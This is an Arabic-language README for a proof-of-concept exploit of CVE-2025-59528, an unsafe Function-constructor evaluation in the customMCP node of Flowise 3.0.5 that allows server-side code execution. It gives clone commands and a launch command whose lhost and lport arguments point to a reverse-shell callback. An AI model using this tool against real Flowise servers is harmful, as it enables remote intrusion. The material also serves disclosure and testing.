
CVE-2025-59528 إثبات المفهوم
يحتوي هذا المستودع على إثبات مفهوم يوضح CVE-2025-59528 في Flowise v3.0.5
توجد الثغرة في عقدة customMCP، حيث تتم معالجة إدخال mcpServerConfig المقدَّم من المستخدم بطريقة تؤدي إلى تنفيذ شيفرة JavaScript عبر تقييم غير آمن باستخدام مُنشئ Function.
| المتأثر | المُصلَح |
|---|---|
| 3.0.5 | 3.0.6 |
قد يتمكن مستخدم مُصادَق من تنفيذ شيفرة JavaScript عشوائية على الخادم، مما قد يؤدي إلى تنفيذ شيفرة عن بُعد.
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
python3 CVE-2025-59528.py -t "<url>" --api-key <api_key> --lhost <ip> --lport <port>

تم توفير هذه الأداة لأغراض تعليمية وبحثية فقط. لا يتحمل المنشئ أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن الأداة.